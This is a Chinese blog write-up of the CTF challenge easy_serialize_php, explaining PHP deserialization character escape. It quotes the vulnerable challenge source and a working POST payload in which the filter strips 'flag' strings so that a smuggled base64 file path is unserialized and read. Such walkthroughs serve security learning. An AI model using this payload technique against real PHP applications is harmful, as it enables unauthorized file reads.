[安洵杯 2019]easy_serialize_php WP

最新推荐文章于 2024-02-14 17:44:51 发布
最新推荐文章于 2024-02-14 17:44:51 发布
阅读量249 收藏
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chizhaji/article/details/114090160
版权

[安洵杯 2019]easy_serialize_php

思考

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';

在传输$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';的时候我试图把后面的s:2:"dd";s:1:"a";删掉然后再传,按照理论的来说
后面应该会输出

array(3) { 
["user"]=> string(24) "";s:8:"function";s:59:"a" 
["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" 
}

但是却输出的是bool(false)把后面的传成任意一个数组的反序列就能成功
我思考了一下应该是原来的 $_SESSION数组有三个元素,当我删去后面的时候再反序列化只能有两个,相比起原来就少了一个,所以最终反序列化失败了,不知道是不是这个原因,希望有大佬能够解答我的疑惑
一这道题来学习一下php反序列化字符逃逸

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

?f=phpinfo()可以看到一个嫌疑文件d0g3_f1ag.php

看样子需要读文件了,读文件在show_image方法中,我们需要把最终的img_path传进去

  1. <?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}';
var_dump(unserialize($str));


输出
array(2) { 
    [0]=> string(8) "Hed9eh0g" 
    [1]=> string(5) "aaaaa" 
}

    如果在str后面再添加一些数据

    <?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc';
var_dump(unserialize($str));


输出
array(2) { 
    [0]=> string(8) "Hed9eh0g" 
    [1]=> string(5) "aaaaa" 
}

    也就是说PHP的反序列化识别是由一定范围的,范围之外的字符不影响反序列化正常执行

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);

输出
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

假设后台存在一个过滤机制,会将含flag字符替换为空,那么以上序列化字符串过滤结果为:a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

这个时候关注第二个s所对应的数字,本来由于有6个flag字符所以为24,现在这6个flag都被过滤了,那么它将会尝试向后读取24个字符看看是否满足序列化的规则,也即读取;s:8:"function";s:59:"a,读取这24个字符后以”;结尾,恰好满足规则,而后第三个s向后读取img的20个字符,第四个、第五个s向后读取均满足规则,所以序列化结果为:

array(3) { 
["user"]=> string(24) "";s:8:"function";s:59:"a" 
["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" 
["dd"]=> string(1) "a" 
}

原本代码的img已经变成了我们想要的路径了

按照这个思路

POST:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

<?php

$flag = 'flag in /d0g3_fllllllag';

?>

再把上面的BASE64改成这个文件就行

不上钻石不改名
关注
专栏目录
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3155
[安洵 2019]easy_serialize_php 反序列化
[安洵 2019]easy_serialize_php
qq_57861415的博客
04-02 97
[安洵 2019]easy_serialize_php
安洵2019 easy_serialize_php (反序列化中的对象逃逸)
a3320315的博客
01-30 7625
0x01 题目源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla...
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 490
buuctf[安洵 2019]easy_serialize_php
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
PHP提供了两种主要的方法用于实现这一功能:一是内置的serialize和unserialize函数,二是使用JSON格式的json_encode和json_decode函数。本文通过实验比较了这两种方法的性能差异。 首先,我们要了解序列化与反序列...
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
[安洵 2019]easy_serialize_php 详解
最新发布
weixin_62306641的博客
02-14 343
在这道题中是将falg,php.......等字符串替换为空,替换完成后对象名,对象的类型,对象的长度都没变,但是内容没了。那么他就会依据长度吧后面的内容给囊括进去。反序列化中的对象是以{}作为开头结尾的,并且有对象名,对象的类型,对象的长度。但是他给出的例子中并没有$_SESSION[img'],这时候就需要利用到php反序列化逃逸。巧合地是,这时候又变成了一个完整的反序列化内容,又可以被解析,于是我们就可以依据这点来利用。从上述例子可以看出来,当序列化再反序列化后,依旧可以根据键名的到值。
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 506
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值